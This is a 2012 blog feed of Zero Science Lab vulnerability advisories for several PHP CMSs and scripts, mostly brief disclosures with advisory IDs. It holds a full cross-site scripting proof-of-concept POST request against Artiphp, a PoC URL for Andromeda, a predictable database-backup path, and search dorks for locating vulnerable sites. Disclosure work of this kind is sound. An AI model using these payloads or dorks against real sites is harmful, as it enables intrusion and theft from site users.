Zero Science Lab

Project KoKiNo

zeroscience — Wed, 16 May 2012 16:12:11 +0000

http://liquidworm.deviantart.com/art/The-Observers-301017154

http://liquidworm.deviantart.com/art/Shoo6-301016589

Artiphp CMS 5.5.0 Database Backup Disclosure Exploit

zeroscience — Wed, 16 May 2012 16:08:03 +0000

Artiphp stores database backups using backupDB() utility with a predictable file name inside the web root, which can be exploited to disclose sensitive information by downloading the file. The backup is located in ‘/artzone/artpublic/database/’ directory as ‘db_backup_[type].[yyyy-mm-dd].sql.gz’ filename.

Advisory ID: ZSL-2012-5091
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5091.php

Artiphp CMS v5.5.0 Multiple XSS POST Injection Vulnerabilities

zeroscience — Wed, 16 May 2012 16:05:07 +0000

Artiphp CMS suffers from multiple cross-site scripting vulnerabilities via several parameters thru POST method. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session.

Advisory ID: ZSL-2012-5090
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5090.php

PoC:
POST /artpublic/recommandation/index.php HTTP/1.1 Content-Length: 619 Content-Type: application/x-www-form-urlencoded Cookie: ARTI=tsouvg67cld88k9ihbqfgk3k77 Host: localhost:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

add_img_name_post "onmouseover=prompt(1) joxy adresse_destinataire adresse_expediteur lab%40zeroscience.mk asciiart_post "onmouseover=prompt(2) joxy expediteur "onmouseover=prompt(3) joxy message Hello%20World message1 %ef%bf%bd%20Recommand%20%ef%bf%bd%0a%bb%20http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f send Send titre_sav "onmouseover=prompt(4) joxy url_sav http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f z39d27af885b32758ac0e7d4014a61561 "onmouseover=prompt(5) joxy zd178e6cdc57b8d6ba3024675f443e920 2

backupDB() v1.2.7a (onlyDB) Remote XSS Vulnerability

zeroscience — Wed, 16 May 2012 16:03:10 +0000

backupDB is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the ‘onlyDB’ parameter of the ‘backupDB.php’ script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

Advisory ID: ZSL-2012-5089
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5089.php

phpThumb() v1.7.11 (dir & title) Cross-Site Scripting Vulnerability

zeroscience — Wed, 16 May 2012 16:00:56 +0000

phpThumb is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the ‘dir’ and the ‘title’ parameter of the ‘phpThumb.demo.random.php’ and ‘phpThumb.demo.showpic.php’ scripts. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

Advisory ID: ZSL-2012-5088
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5088.php

Andromeda Streaming MP3 Server v1.9.3.6 (s param) Remote XSS Vulnerability

zeroscience — Wed, 09 May 2012 02:04:07 +0000

Andromeda is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the ‘s’ parameter of the ‘andromeda.php’ script.

Advisory ID: ZSL-2012-5087
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5087.php

Dork: “powered by andromeda version”

PoC: http://localhost/AndromedaPHP/andromeda.php?q=s&s=”>

Baby Gekko CMS v1.1.5c Multiple Stored Cross-Site Scripting Vulnerabilities

zeroscience — Wed, 02 May 2012 20:02:35 +0000

Baby Gekko CMS suffers from multiple stored (post-auth) XSS vulnerabilities and path disclosure issues when parsing user input to several parameters via GET and POST method. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session or disclose the full installation path of the affected CMS.

——————————————————————————–

Reflected (Non-Persistent) XSS:

1. username
2. password
3. verification_code
4. email_address
5. password_verify
6. firstname
7. lastname

Stored (Persistent) XSS:

8. groupname
9. virtual_filename
10. branch
11. contact_person
12. street
13. city
14. province
15. postal
16. country
17. tollfree
18. phone
19. fax
20. mobile
21. title
22. meta_key
23. meta_description

——————————————————————————–

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5086.php
Vendor: http://www.babygekko.com/site/news/general/baby-gekko-v1-2-0-released-with-3rd-party-independent-security-testing-performed-by-zero-science-lab.html

Rekniht

zeroscience — Thu, 26 Apr 2012 13:36:42 +0000

http://liquidworm.deviantart.com/art/Rekniht-298512176

Anchor CMS v0.6 Multiple Persistent XSS Vulnerabilities

zeroscience — Fri, 20 Apr 2012 17:46:07 +0000

Anchor CMS suffers from multiple stored and reflected XSS vulnerabilities when parsing user input to several parameters via GET and POST method. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

Dork: “intext:Powered by Anchor, version 0.6”

Advisory ID: ZSL-2012-5085
Advisory details: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5085.php

BGS CMS v2.2.1 Multiple Stored Cross-Site Scripting Vulnerabilities

zeroscience — Wed, 11 Apr 2012 02:04:51 +0000

BGS CMS suffers from multiple stored and reflected XSS vulnerabilities when parsing user input to several parameters via GET and POST method (post-auth). Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

Dork: footer: “powered by BGS CMS”

Advisory ID: ZSL-2012-5084
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5084.php